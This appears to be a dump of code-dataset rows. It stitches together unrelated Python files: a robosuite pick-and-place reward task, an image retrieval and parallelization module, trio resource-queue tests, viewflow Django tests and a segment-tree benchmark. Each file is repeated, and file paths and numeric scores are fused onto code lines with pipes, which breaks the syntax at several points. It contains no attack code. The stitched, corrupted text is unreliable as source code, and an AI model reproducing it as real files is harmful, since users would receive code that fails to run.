- (float) reward from the environment
- (bool) whether the current episode is completed or not
- (dict) empty dict to be filled with information by subclassed method
"""
reward = self.reward(action)
# done if number of elapsed timesteps is greater than horizon
# self.dropped_object or ((self.timestep >= self.horizon) and not self.ignore_done)
self.done = False
self.dropped_object = False
return reward, self.done, {} | compositional-rl-benchmark/composition/composition/tasks/pick_place_subtask.py | import numpy as np
from composition.arenas.pick_place_arena import PickPlaceArena
from composition.env.compositional_env import CompositionalEnv
from composition.tasks.task_utils import dot_product_angle
import robosuite.utils.transform_utils as T
from robosuite.utils.placement_samplers import UniformRandomSampler
class PickPlaceSubtask(CompositionalEnv):
"""
This class corresponds to the pick place task for a single robot arm.
Args:
bin1_pos (3-tuple): Absolute cartesian coordinates of the bin initially holding the objects
bin2_pos (3-tuple): Absolute cartesian coordinates of the goal bin
use_object_obs (bool): if True, include object (cube) information in
the observation.
reward_scale (None or float): Scales the normalized reward function by the amount specified.
If None, environment reward remains unnormalized
reward_shaping (bool): if True, use dense rewards.
object_type (string): if provided, should be one of "milk", "bread", "cereal",
or "can". Determines which type of object will be spawned on every
environment reset. Only used if @single_object_mode is 2.
Raises:
AssertionError: [Invalid object type specified]
AssertionError: [Invalid number of robots specified]
"""
def __init__(
self,
robots,
object_type,
obstacle,
env_configuration="default",
controller_configs=None,
mount_types="default",
gripper_types="RethinkGripper",
initialization_noise=None,
use_camera_obs=True,
use_object_obs=True,
use_task_id_obs=False,
has_renderer=False,
has_offscreen_renderer=True,
render_camera="frontview",
render_collision_mesh=False,
render_visual_mesh=True,
render_gpu_device_id=-1,
control_freq=20,
horizon=1000,
ignore_done=False,
hard_reset=True,
camera_names="agentview",
camera_heights=256,
camera_widths=256,
camera_depths=False,
bin1_pos=(0.1, -0.26, 0.8),
bin2_pos=(0.1, 0.13, 0.8),
reward_scale=1.0,
reward_shaping=False,
):
self.subtask_id = 0
super().__init__(
robots,
object_type,
obstacle,
bin1_pos,
bin2_pos,
env_configuration=env_configuration,
controller_configs=controller_configs,
mount_types=mount_types,
gripper_types=gripper_types,
initialization_noise=initialization_noise,
use_camera_obs=use_camera_obs,
use_object_obs=use_object_obs,
use_task_id_obs=use_task_id_obs,
has_renderer=has_renderer,
has_offscreen_renderer=has_offscreen_renderer,
render_camera=render_camera,
render_collision_mesh=render_collision_mesh,
render_visual_mesh=render_visual_mesh,
render_gpu_device_id=render_gpu_device_id,
control_freq=control_freq,
horizon=horizon,
ignore_done=ignore_done,
hard_reset=hard_reset,
camera_names=camera_names,
camera_heights=camera_heights,
camera_widths=camera_widths,
camera_depths=camera_depths,
reward_scale=reward_scale,
reward_shaping=reward_shaping,
)
self.was_grasping = False
self.dropped_object = False
def staged_rewards(self, action):
"""
Returns staged rewards based on current physical states.
Stages consist of reaching, grasping, lifting, and hovering.
Returns:
4-tuple:
- (float) reaching reward
- (float) grasping reward
- (float) lifting reward
- (float) hovering reward
"""
reach_mult = 0.2
grasp_mult = 0.3
lift_mult = 0.5
hover_mult = 0.7
drop_mult = 0.9
r_align = 0
# reaching reward governed by distance to closest object
r_reach = 0.
if not self.object_in_bin:
# get reaching reward via minimum distance to a target object
dist = self._gripper_to_target(
gripper=self.robots[0].gripper,
target=self.object.root_body,
target_type="body",
return_distance=True,
)
r_reach = (1 - np.tanh(10.0 * dist)) * reach_mult
# grasping reward for touching any objects of interest
is_grasping = self._check_grasp(
gripper=self.robots[0].gripper,
object_geoms=[g for g in self.object.contact_geoms])
r_grasp = int(is_grasping) * grasp_mult
# lifting reward for picking up an object
r_lift = 0.
if not self.object_in_bin and r_grasp > 0.:
z_target = self.bin2_pos[2] + 0.25
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.abs(z_target - object_z_loc)
r_lift = grasp_mult + (1 - np.tanh(5.0 * z_dist)) * (
lift_mult - grasp_mult
)
# segment objects into left of the bins and above the bins
object_xy_loc = self.sim.data.body_xpos[self.obj_body_id, :2]
y_check = (
np.abs(object_xy_loc[1] -
self.bin2_pos[1])
< self.bin2_size[1]
)
x_check = (
np.abs(object_xy_loc[0] -
self.bin2_pos[0])
< self.bin2_size[0]
)
object_above_bin = x_check and y_check
# hover reward for getting object above bin
r_hover = 0.
r_drop = 0.
if not self.object_in_bin and r_lift > 0.45:
dist = np.linalg.norm(
self.bin2_pos[:2] - object_xy_loc
)
# objects to the left get r_lift added to hover reward,
# those on the right get max(r_lift) added (to encourage dropping)
if not object_above_bin:
r_hover = r_lift + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
else:
r_hover = lift_mult + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
if r_grasp > 0 and object_above_bin:
z_target = self.bin2_pos[2] + 0.1
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.maximum(object_z_loc - z_target, 0.)
r_drop = hover_mult + \
(1 - np.tanh(5.0 * z_dist)) * (drop_mult - hover_mult)
# print('is_grasping:', is_grasping, 'was_grasping:', self.was_grasping, 'gripper_pos:', self.sim.data.site_xpos[self.robots[0].eef_site_id, 2], 'target_h:', self.bin2_pos[2] + 0.1 )
# TODO: this height is arbitrary and won't work for eg milk and cereal
if (not is_grasping) and self.was_grasping and self.sim.data.site_xpos[self.robots[0].eef_site_id, 2] > self.bin2_pos[2] + 0.1:
self.dropped_object = True
self.was_grasping = is_grasping
return r_align, r_reach, r_grasp, r_lift, r_hover, r_drop
def not_in_bin(self, obj_pos):
bin_x_low = self.bin2_pos[0] - self.bin2_size[0]
bin_y_low = self.bin2_pos[1] - self.bin2_size[1]
bin_x_high = self.bin2_pos[0] + self.bin2_size[0]
bin_y_high = self.bin2_pos[1] + self.bin2_size[1]
res = True
if (
bin_x_low < obj_pos[0] < bin_x_high
and bin_y_low < obj_pos[1] < bin_y_high
and self.bin2_pos[2] < obj_pos[2] < self.bin2_pos[2] + 0.1
):
res = False
return res
def _get_placement_initializer(self):
"""
Helper function for defining placement initializer and object sampling bounds.
"""
super()._get_placement_initializer()
bin_x_low = -self.bin2_size[0] / 2
bin_y_low = -self.bin2_size[1] / 2
bin_x_high = self.bin2_size[0] / 2
bin_y_high = self.bin2_size[1] / 2
# TODO: why is this not exactly in the middle
self.placement_initializer.append_sampler(
sampler=UniformRandomSampler(
name=f"{self.visual_object.name}ObjectSampler",
mujoco_objects=self.visual_object,
x_range=[bin_x_low, bin_x_high],
y_range=[bin_y_low, bin_y_high],
rotation=0.,
rotation_axis='z',
ensure_object_boundary_in_range=False,
ensure_valid_placement=False,
reference_pos=self.bin2_pos,
z_offset=self.bin2_pos[2] - self.bin1_pos[2],
)
)
def _load_model(self):
"""
Loads an xml model, puts it in self.model
"""
# load model for table top workspace
self.mujoco_arena = PickPlaceArena(
bin1_pos=self.bin1_pos,
)
# Load model propagation
super()._load_model()
# Generate placement initializer
self._initialize_model()
self._get_placement_initializer()
def _setup_references(self):
"""
Sets up references to important components. A reference is typically an
index or a list of indices that point to the corresponding elements
in a flatten array, which is how MuJoCo stores physical simulation data.
"""
# keep track of which objects are in their corresponding bins
self.object_in_bin = False
# target locations in bin for each object type
self.target_bin_placements = np.zeros((1, 3))
# TODO: fix this once i understand why its here
# I think we can remove target bin placements
bin_x_low = self.bin2_pos[0]
bin_y_low = self.bin2_pos[1]
bin_x_low += self.bin2_size[0] / 2.
bin_y_low += self.bin2_size[1] / 2.
self.target_bin_placements[0, :] = [
bin_x_low, bin_y_low, self.bin2_pos[2]]
super()._setup_references()
def _reset_internal(self):
"""
Resets simulation internal configurations.
"""
super()._reset_internal()
self.was_grasping = False
# Set the bins to the desired position
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin1")] = self.bin1_pos
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin2")] = self.bin2_pos
def _check_success(self):
"""
Check if all objects have been successfully placed in their corresponding bins.
Returns:
bool: True if object is placed correctly
"""
# remember objects that are in the correct bins
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
obj_pos = self.sim.data.body_xpos[self.obj_body_id]
dist = np.linalg.norm(gripper_site_pos - obj_pos)
r_reach = 1 - np.tanh(10.0 * dist)
# self.object_in_bin = not self.not_in_bin(obj_pos)
self.object_in_bin = bool(
(not self.not_in_bin(obj_pos)) and r_reach > 0.35)
return self.object_in_bin
def _post_action(self, action):
"""
Do any housekeeping after taking an action.
Args:
action (np.array): Action to execute within the environment
Returns:
3-tuple:
- (float) reward from the environment
- (bool) whether the current episode is completed or not
- (dict) empty dict to be filled with information by subclassed method
"""
reward = self.reward(action)
# done if number of elapsed timesteps is greater than horizon
# self.dropped_object or ((self.timestep >= self.horizon) and not self.ignore_done)
self.done = False
self.dropped_object = False
return reward, self.done, {} | 0.781497 | 0.482795 |
from absl import logging
from joblib import Parallel, delayed
from PIL import ImageFile
import atlasmaker_io
import convert
def get_and_convert_image(image_location, image_convert_settings,
                          allow_truncated_images=False, disk_cache=False,
                          request_timeout=60, http_max_retries=2):
    """Wrapper method that retrieves and converts one image.

    If run all in-memory (i.e., no disk spill), then returns PIL Image object.
    Otherwise returns path of disk-cached image.

    Args:
      image_location: Image path from the input list of locations.
      image_convert_settings: ImageConvertSettings object.
      allow_truncated_images: If True, PIL will be tolerant of truncated image
                              files and load/process them. Note that this isn't
                              supported on old versions on PIL, just pillow.
      disk_cache: Store intermediary image objects to disk. Not supported yet.
      request_timeout: Max secs for http requests before timeout.
      http_max_retries: Max number of attempts we will try to retrieve http
                       images due to timeout errors.

    Returns:
      A tuple (Image object or None if fails, status message string). Status
      message string will be empty if success, or error message if failure.

    Exceptions handled:
      All exceptions for image retrieval are handled. Some notable ones are:
        - DecompressionBombError: Image is too large (>0.5G). See PIL
                                  documentation for instructions on setting a
                                  higher threshold.
      For image conversion, the following errors are handled:
        - IOError: error retrieving image file, or truncated image file.
    """
    if disk_cache:
        raise NotImplementedError()
    if allow_truncated_images:
        try:
            ImageFile.LOAD_TRUNCATED_IMAGES = True
        except AttributeError as e:
            logging.warning('Are you using PILLOW and not a very old version of PIL? '
                            'Unable to force load of truncated image files: %s', e)
    try:
        src_image = atlasmaker_io.get_image(image_location, request_timeout,
                                            http_max_retries=http_max_retries)
    except Exception as e:  # Any retrieval failure is non-fatal by design.
        logging.error('Retrieval of file %s failed with error: %s',
                      image_location, e)
        return None, str(e)
    try:
        image_converter = convert.ImageConverter(src_image, image_convert_settings)
        converted = image_converter.convert()
        # Log success only after convert() completed; the original logged
        # before running the conversion, which could still raise below.
        # Lazy %-args avoid formatting cost when debug logging is disabled.
        logging.debug('Successfully converted image: %s', image_location)
        return converted, ''
    except IOError as e:
        logging.error('Conversion of file %s failed with error: %s',
                      image_location, e)
        return None, str(e)
def get_and_convert_images_parallel(image_src_locations, image_convert_settings,
                                    n_jobs=-1, disk_cache=False, threads=False,
                                    verbose=10, allow_truncated_images=False,
                                    request_timeout=60, http_max_retries=2):
    """Parallelize retrieving and converting image tasks.

    Args:
      image_src_locations: List of source image paths (filepaths, URLs, etc).
      n_jobs: Number of parallel jobs; -1 uses all CPUs. See joblib.Parallel.
      image_convert_settings: ImageConvertSettings object.
      disk_cache: If True, will cache converted images to disk.
      threads: If true, use threads instead of processes.
      verbose: verbosity level for parallel. See joblib.Parallel documentation.
      allow_truncated_images: If True, PIL will be tolerant of truncated image
                              files and load/process them. Note that this isn't
                              supported on old versions on PIL, just pillow.
      request_timeout: Max secs for http requests before timeout.
      http_max_retries: Max number of attempts we will try to retrieve http
                       images due to timeout errors.

    Returns:
      List of tuples, where each tuple contains
      (converted Image object or None, status/error message string).
    """
    # Lazy %-args avoid formatting work when the log level is disabled.
    logging.info('Parallelizing with setting %d jobs', n_jobs)
    backend = None
    if threads:
        logging.debug('Parallelizing using threads.')
        backend = 'threading'
    outputs = Parallel(n_jobs=n_jobs, backend=backend, verbose=verbose)(
        delayed(get_and_convert_image)(
            location, image_convert_settings,
            allow_truncated_images=allow_truncated_images,
            disk_cache=disk_cache, request_timeout=request_timeout,
            http_max_retries=http_max_retries)
        for location in image_src_locations)
    return outputs
def convert_default_image(image_location, image_convert_settings):
    """Return converted default image used for failures.

    Args:
      image_location: Path or URL of image.
      image_convert_settings: ImageConvertSettings object.

    Raises:
      IOError: if the default image cannot be retrieved or converted.
    """
    default_img, status = get_and_convert_image(
        image_location, image_convert_settings=image_convert_settings)
    del status  # linter.
    if default_img is None:
        # NOTE(review): "retrive" is a typo ("retrieve") in this runtime
        # message — left byte-identical here to preserve behavior.
        raise IOError('Unable to retrive and convert default image.')
    # NOTE(review): trailing "| facets_atlasmaker/parallelize.py |" below is a
    # dataset-extraction artifact fused onto the return line, not code.
    return default_img | facets_atlasmaker/parallelize.py |
from absl import logging
from joblib import Parallel, delayed
from PIL import ImageFile
import atlasmaker_io
import convert
def get_and_convert_image(image_location, image_convert_settings,
                          allow_truncated_images=False, disk_cache=False,
                          request_timeout=60, http_max_retries=2):
    """Wrapper method that retrieves and converts one image.

    If run all in-memory (i.e., no disk spill), then returns PIL Image object.
    Otherwise returns path of disk-cached image.

    Args:
      image_location: Image path from the input list of locations.
      image_convert_settings: ImageConvertSettings object.
      allow_truncated_images: If True, PIL will be tolerant of truncated image
                              files and load/process them. Note that this isn't
                              supported on old versions on PIL, just pillow.
      disk_cache: Store intermediary image objects to disk. Not supported yet.
      request_timeout: Max secs for http requests before timeout.
      http_max_retries: Max number of attempts we will try to retrieve http
                       images due to timeout errors.

    Returns:
      A tuple (Image object or None if fails, status message string). Status
      message string will be empty if success, or error message if failure.

    Exceptions handled:
      All exceptions for image retrieval are handled. Some notable ones are:
        - DecompressionBombError: Image is too large (>0.5G). See PIL
                                  documentation for instructions on setting a
                                  higher threshold.
      For image conversion, the following errors are handled:
        - IOError: error retrieving image file, or truncated image file.
    """
    if disk_cache:
        raise NotImplementedError()
    if allow_truncated_images:
        try:
            ImageFile.LOAD_TRUNCATED_IMAGES = True
        except AttributeError as e:
            logging.warning('Are you using PILLOW and not a very old version of PIL? '
                            'Unable to force load of truncated image files: %s', e)
    try:
        src_image = atlasmaker_io.get_image(image_location, request_timeout,
                                            http_max_retries=http_max_retries)
    except Exception as e:  # Any retrieval failure is non-fatal by design.
        logging.error('Retrieval of file %s failed with error: %s',
                      image_location, e)
        return None, str(e)
    try:
        image_converter = convert.ImageConverter(src_image, image_convert_settings)
        converted = image_converter.convert()
        # Log success only after convert() completed; the original logged
        # before running the conversion, which could still raise below.
        # Lazy %-args avoid formatting cost when debug logging is disabled.
        logging.debug('Successfully converted image: %s', image_location)
        return converted, ''
    except IOError as e:
        logging.error('Conversion of file %s failed with error: %s',
                      image_location, e)
        return None, str(e)
def get_and_convert_images_parallel(image_src_locations, image_convert_settings,
                                    n_jobs=-1, disk_cache=False, threads=False,
                                    verbose=10, allow_truncated_images=False,
                                    request_timeout=60, http_max_retries=2):
    """Parallelize retrieving and converting image tasks.

    Args:
      image_src_locations: List of source image paths (filepaths, URLs, etc).
      n_jobs: Number of parallel jobs; -1 uses all CPUs. See joblib.Parallel.
      image_convert_settings: ImageConvertSettings object.
      disk_cache: If True, will cache converted images to disk.
      threads: If true, use threads instead of processes.
      verbose: verbosity level for parallel. See joblib.Parallel documentation.
      allow_truncated_images: If True, PIL will be tolerant of truncated image
                              files and load/process them. Note that this isn't
                              supported on old versions on PIL, just pillow.
      request_timeout: Max secs for http requests before timeout.
      http_max_retries: Max number of attempts we will try to retrieve http
                       images due to timeout errors.

    Returns:
      List of tuples, where each tuple contains
      (converted Image object or None, status/error message string).
    """
    # Lazy %-args avoid formatting work when the log level is disabled.
    logging.info('Parallelizing with setting %d jobs', n_jobs)
    backend = None
    if threads:
        logging.debug('Parallelizing using threads.')
        backend = 'threading'
    outputs = Parallel(n_jobs=n_jobs, backend=backend, verbose=verbose)(
        delayed(get_and_convert_image)(
            location, image_convert_settings,
            allow_truncated_images=allow_truncated_images,
            disk_cache=disk_cache, request_timeout=request_timeout,
            http_max_retries=http_max_retries)
        for location in image_src_locations)
    return outputs
def convert_default_image(image_location, image_convert_settings):
    """Return converted default image used for failures.

    Args:
      image_location: Path or URL of image.
      image_convert_settings: ImageConvertSettings object.

    Raises:
      IOError: if the default image cannot be retrieved or converted.
    """
    default_img, status = get_and_convert_image(
        image_location, image_convert_settings=image_convert_settings)
    del status  # linter.
    if default_img is None:
        # NOTE(review): "retrive" is a typo ("retrieve") in this runtime
        # message — left byte-identical here to preserve behavior.
        raise IOError('Unable to retrive and convert default image.')
    # NOTE(review): the trailing "| 0.831759 | 0.334589" below is a
    # dataset-extraction artifact fused onto the return line, not code.
    return default_img | 0.831759 | 0.334589
import random
import pytest
import trio
from ddht.resource_queue import ResourceQueue
async def _yield(num: int = 10, base: int = 0):
    """Yield control to the trio scheduler a randomized number of times."""
    checkpoints = base + random.randint(0, num)
    for _ in range(checkpoints):
        await trio.lowlevel.checkpoint()
@pytest.mark.trio
async def test_resource_queue_fuzzy():
    # Fuzz the queue: many cooperating workers with randomized yield points.
    known_resources = {"a", "b", "c", "d"}
    queue = ResourceQueue(known_resources)
    # Resources currently held by some worker; reservation must be exclusive.
    resources_in_use = set()
    seen_resources = set()
    async def worker(seen):
        """
        Worker process intended to try and hit as many edge cases as possible
        about what could happen within the context block of
        `ResourceQueue.reserve` by yielding to trio at as many stages as
        possible.
        """
        while True:
            async with queue.reserve() as resource:
                seen.add(resource)
                assert resource in queue
                await _yield()
                # No other worker may hold this resource while we reserve it.
                assert resource not in resources_in_use
                resources_in_use.add(resource)
                await _yield()
                resources_in_use.remove(resource)
                await _yield()
                assert resource not in resources_in_use
    async with trio.open_nursery() as nursery:
        for _ in range(10):
            nursery.start_soon(worker, seen_resources)
        # Give workers plenty of scheduler passes to cycle every resource.
        await _yield(1, 500)
        assert seen_resources == queue.resources
        assert "e" not in queue
        assert "f" not in queue
        # Now add two more resources. They should get picked up by the new
        # workers.
        await queue.add("e")
        await queue.add("f")
        assert "e" in queue
        assert "f" in queue
        await _yield(1, 500)
        seen_resources_after_add = set()
        for _ in range(10):
            nursery.start_soon(worker, seen_resources_after_add)
        await _yield(1, 500)
        # Fresh workers should see every resource, including the two added
        # mid-run.
        assert seen_resources_after_add == queue.resources
        nursery.cancel_scope.cancel()
@pytest.mark.trio
async def test_resource_queue_add_idempotent():
    # Re-adding an existing resource must not grow the queue.
    queue = ResourceQueue(("a", "b", "c"))
    assert len(queue) == 3
    await queue.add("a")
    assert len(queue) == 3
    await queue.add("d")
    assert len(queue) == 4
@pytest.mark.trio
async def test_resource_queue_remove_idempotent():
    # The second remove of "a" targets an absent resource; per the test name
    # it should succeed silently (idempotence).
    queue = ResourceQueue(("a", "b", "c"))
    assert len(queue) == 3
    await queue.remove("a")
    assert len(queue) == 2
    await queue.remove("a") | tests/core/test_resource_queue.py | import random
import pytest
import trio
from ddht.resource_queue import ResourceQueue
async def _yield(num: int = 10, base: int = 0):
    """Yield control to the trio scheduler a randomized number of times."""
    checkpoints = base + random.randint(0, num)
    for _ in range(checkpoints):
        await trio.lowlevel.checkpoint()
@pytest.mark.trio
async def test_resource_queue_fuzzy():
    # Fuzz the queue: many cooperating workers with randomized yield points.
    known_resources = {"a", "b", "c", "d"}
    queue = ResourceQueue(known_resources)
    # Resources currently held by some worker; reservation must be exclusive.
    resources_in_use = set()
    seen_resources = set()
    async def worker(seen):
        """
        Worker process intended to try and hit as many edge cases as possible
        about what could happen within the context block of
        `ResourceQueue.reserve` by yielding to trio at as many stages as
        possible.
        """
        while True:
            async with queue.reserve() as resource:
                seen.add(resource)
                assert resource in queue
                await _yield()
                # No other worker may hold this resource while we reserve it.
                assert resource not in resources_in_use
                resources_in_use.add(resource)
                await _yield()
                resources_in_use.remove(resource)
                await _yield()
                assert resource not in resources_in_use
    async with trio.open_nursery() as nursery:
        for _ in range(10):
            nursery.start_soon(worker, seen_resources)
        # Give workers plenty of scheduler passes to cycle every resource.
        await _yield(1, 500)
        assert seen_resources == queue.resources
        assert "e" not in queue
        assert "f" not in queue
        # Now add two more resources. They should get picked up by the new
        # workers.
        await queue.add("e")
        await queue.add("f")
        assert "e" in queue
        assert "f" in queue
        await _yield(1, 500)
        seen_resources_after_add = set()
        for _ in range(10):
            nursery.start_soon(worker, seen_resources_after_add)
        await _yield(1, 500)
        # Fresh workers should see every resource, including the two added
        # mid-run.
        assert seen_resources_after_add == queue.resources
        nursery.cancel_scope.cancel()
@pytest.mark.trio
async def test_resource_queue_add_idempotent():
    # Re-adding an existing resource must not grow the queue.
    queue = ResourceQueue(("a", "b", "c"))
    assert len(queue) == 3
    await queue.add("a")
    assert len(queue) == 3
    await queue.add("d")
    assert len(queue) == 4
@pytest.mark.trio
async def test_resource_queue_remove_idempotent():
    # The second remove of "a" targets an absent resource; per the test name
    # it should succeed silently (idempotence).
    queue = ResourceQueue(("a", "b", "c"))
    assert len(queue) == 3
    await queue.remove("a")
    assert len(queue) == 2
    # NOTE(review): trailing "| 0.612541 | 0.36869" below is a
    # dataset-extraction artifact fused onto the final line, not code.
    await queue.remove("a") | 0.612541 | 0.36869
from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.db import models
from django.test import TestCase, RequestFactory
from django.urls import resolve
from django.views import generic
from viewflow import flow
from viewflow.activation import STATUS
from viewflow.base import Flow, this
from viewflow.flow import views, viewset
class Test(TestCase):
    """Exercises flow start views via both the mixin and the stock view."""

    def _assert_starts_flow(self, view):
        """Drive *view* through a GET and a POST and verify the flow starts.

        GET must render the flow's start template chain; POST must redirect
        and leave a completed start task on the newly created process.
        """
        user = User.objects.create(username='test', is_superuser=True)
        # get
        request = RequestFactory().get('/start/')
        request.user = user
        request.resolver_match = resolve('/test/start/')
        response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
        self.assertEqual(response.template_name,
                         ('tests/test_views_start/startviewtest/start.html',
                          'tests/test_views_start/startviewtest/start.html',
                          'viewflow/flow/start.html'))
        # post
        request = RequestFactory().post('/start/')
        request.user = user
        request.resolver_match = resolve('/test/start/')
        response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
        self.assertEqual(response.status_code, 302)
        process = StartViewTestFlow.process_class.objects.all()[0]
        # get_task raises if the start task did not complete.
        process.get_task(StartViewTestFlow.start, status=[STATUS.DONE])

    def test_startview_mixin_with_create_view(self):
        # The mixin combined with a vanilla CreateView should behave like a
        # start view.
        class StartView(views.StartFlowMixin, generic.CreateView):
            model = StartViewFlowEntity
            fields = []
        self._assert_starts_flow(StartView.as_view())

    def test_startprocess_view(self):
        self._assert_starts_flow(views.CreateProcessView.as_view())
class StartViewTestFlow(Flow):
    # Minimal two-node flow: a start task that leads straight to the end.
    start = flow.Start().Next(this.end)
    end = flow.End()
class StartViewFlowEntity(models.Model):
    """Empty model used as the CreateView target in the mixin test."""
    pass
# Route the flow's views under /test/ so resolve('/test/start/') above works.
urlpatterns = [
    url(r'^test/', include((viewset.FlowViewSet(StartViewTestFlow).urls, 'startviewtest')))
]
try:
    # Django >= 1.7: point the test case at this module's urlconf.
    from django.test import override_settings
    Test = override_settings(ROOT_URLCONF=__name__)(Test)
except ImportError:
    """
    django 1.6
    """
    # NOTE(review): trailing "| Scripts/... | from django..." below is a
    # dataset-extraction artifact fused onto the final line, not code.
    Test.urls = __name__ | Scripts/ict/tests/test_views_start.py | from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.db import models
from django.test import TestCase, RequestFactory
from django.urls import resolve
from django.views import generic
from viewflow import flow
from viewflow.activation import STATUS
from viewflow.base import Flow, this
from viewflow.flow import views, viewset
class Test(TestCase):
    """Exercises flow start views via both the mixin and the stock view."""

    def _assert_starts_flow(self, view):
        """Drive *view* through a GET and a POST and verify the flow starts.

        GET must render the flow's start template chain; POST must redirect
        and leave a completed start task on the newly created process.
        """
        user = User.objects.create(username='test', is_superuser=True)
        # get
        request = RequestFactory().get('/start/')
        request.user = user
        request.resolver_match = resolve('/test/start/')
        response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
        self.assertEqual(response.template_name,
                         ('tests/test_views_start/startviewtest/start.html',
                          'tests/test_views_start/startviewtest/start.html',
                          'viewflow/flow/start.html'))
        # post
        request = RequestFactory().post('/start/')
        request.user = user
        request.resolver_match = resolve('/test/start/')
        response = view(request, flow_class=StartViewTestFlow, flow_task=StartViewTestFlow.start)
        self.assertEqual(response.status_code, 302)
        process = StartViewTestFlow.process_class.objects.all()[0]
        # get_task raises if the start task did not complete.
        process.get_task(StartViewTestFlow.start, status=[STATUS.DONE])

    def test_startview_mixin_with_create_view(self):
        # The mixin combined with a vanilla CreateView should behave like a
        # start view.
        class StartView(views.StartFlowMixin, generic.CreateView):
            model = StartViewFlowEntity
            fields = []
        self._assert_starts_flow(StartView.as_view())

    def test_startprocess_view(self):
        self._assert_starts_flow(views.CreateProcessView.as_view())
class StartViewTestFlow(Flow):
    # Minimal two-node flow: a start task that leads straight to the end.
    start = flow.Start().Next(this.end)
    end = flow.End()
class StartViewFlowEntity(models.Model):
    """Empty model used as the CreateView target in the mixin test."""
    pass
# Route the flow's views under /test/ so resolve('/test/start/') above works.
urlpatterns = [
    url(r'^test/', include((viewset.FlowViewSet(StartViewTestFlow).urls, 'startviewtest')))
]
try:
    # Django >= 1.7: point the test case at this module's urlconf.
    from django.test import override_settings
    Test = override_settings(ROOT_URLCONF=__name__)(Test)
except ImportError:
    """
    django 1.6
    """
    # NOTE(review): trailing "| 0.424173 | 0.20454" below is a
    # dataset-extraction artifact fused onto the final line, not code.
    Test.urls = __name__ | 0.424173 | 0.20454
import operator
import random
import statistics
import timeit
from typing import Any, List, Type
import tabulate
import pysegmenttree._pysegmenttree_py
import pysegmenttree.c_extensions
def get_random_query(start: int, end: int):
    """Return a sorted [lo, hi] pair drawn uniformly from [start, end]."""
    # Two randint draws in the same order as before, returned ascending.
    return sorted(random.randint(start, end) for _ in range(2))
def bench_build(tree_cls: Type, size: int = 1_000_000):
    """Time construction of *tree_cls* from a random int container.

    Returns the list of per-repeat wall-clock times from timeit.repeat.
    """
    print(f"\n{tree_cls.__name__}: build")
    print(f"Tree size: {size}")
    random.seed(42)  # Reproducibility: same container for every implementation.
    container = [random.randint(-100, 100) for _ in range(size)]
    # timeit evaluates the statement by name, so expose our locals to it.
    context = {**globals(), **locals()}
    return timeit.repeat(
        f"{tree_cls.__module__}.{tree_cls.__name__}(container)",
        globals=context,
        number=1,
        repeat=5,
    )
def bench_query(tree_cls: Type, size: int = 100_000, queries: int = 10000):
    """Time *queries* tree.query calls against a prebuilt tree.

    Returns the list of per-repeat wall-clock times from timeit.repeat.
    """
    print(f"\n{tree_cls.__name__}: query")
    print(f"Tree size: {size}, queries count: {queries}")
    random.seed(42)  # Reproducibility: same data for every implementation.
    container = [random.randint(-100, 100) for _ in range(size)]
    tree = tree_cls(container)
    # Pre-generate queries so RNG cost is excluded from the timed loop.
    prepared_queries = [get_random_query(0, size - 1) for _ in range(queries)]
    # timeit evaluates the statement by name, so expose our locals to it.
    context = {**globals(), **locals()}
    return timeit.repeat(
        "for query in prepared_queries: tree.query(*query)",
        globals=context,
        number=1,
        repeat=5,
    )
def bench_update(tree_cls: Type, size: int = 100_000, queries: int = 10000):
    """Time *queries* tree.update calls against a prebuilt tree.

    Returns the list of per-repeat wall-clock times from timeit.repeat.
    """
    print(f"\n{tree_cls.__name__}: update")
    print(f"Tree size: {size}, queries count: {queries}")
    random.seed(42)  # Reproducibility: same data for every implementation.
    container = [random.randint(-100, 100) for _ in range(size)]
    tree = tree_cls(container)
    # Each update is (index, new value), generated up front so RNG cost is
    # excluded from the timed loop.
    prepared_queries = [
        [random.randint(0, size - 1), random.randint(-100, 100)] for _ in range(queries)
    ]
    # timeit evaluates the statement by name, so expose our locals to it.
    context = {**globals(), **locals()}
    return timeit.repeat(
        "for query in prepared_queries: tree.update(*query)",
        globals=context,
        number=1,
        repeat=5,
    )
# Segment-tree implementations benchmarked against one another.
IMPLEMENTATIONS = [
    pysegmenttree._pysegmenttree_py.PySegmentTree,
    pysegmenttree.c_extensions.IntSegmentTree,
    pysegmenttree.c_extensions.FloatSegmentTree,
]
# Benchmark name -> benchmark function.
BENCHES = {
    "build": bench_build,
    "query": bench_query,
    # Bug fix: "update" previously mapped to bench_query, so the update
    # benchmark was never actually run.
    "update": bench_update,
}
if __name__ == "__main__":
    # First row is the header: one column per implementation.
    results_table = [["-", *(impl.__name__ for impl in IMPLEMENTATIONS)]]
    for bench, func in BENCHES.items():
        results_table.append([bench])
        for tree_cls in IMPLEMENTATIONS:
            timeit_results = func(tree_cls)
            # Report the mean of the timeit repeats per implementation.
            mean = statistics.mean(timeit_results)
            results_table[-1].append(mean)
    # NOTE(review): trailing "| benchmarks/benchmark.py | import operator"
    # below is a dataset-extraction artifact fused onto the final line.
    print(tabulate.tabulate(results_table, headers="firstrow", tablefmt="grid")) | benchmarks/benchmark.py | import operator
import random
import statistics
import timeit
from typing import Any, List, Type
import tabulate
import pysegmenttree._pysegmenttree_py
import pysegmenttree.c_extensions
def get_random_query(start: int, end: int):
    """Return a sorted [lo, hi] pair drawn uniformly from [start, end]."""
    # Two randint draws in the same order as before, returned ascending.
    return sorted(random.randint(start, end) for _ in range(2))
def bench_build(tree_cls: Type, size: int = 1_000_000):
    """Time construction of *tree_cls* from a random int container.

    Returns the list of per-repeat wall-clock times from timeit.repeat.
    """
    print(f"\n{tree_cls.__name__}: build")
    print(f"Tree size: {size}")
    random.seed(42)  # Reproducibility: same container for every implementation.
    container = [random.randint(-100, 100) for _ in range(size)]
    # timeit evaluates the statement by name, so expose our locals to it.
    context = {**globals(), **locals()}
    return timeit.repeat(
        f"{tree_cls.__module__}.{tree_cls.__name__}(container)",
        globals=context,
        number=1,
        repeat=5,
    )
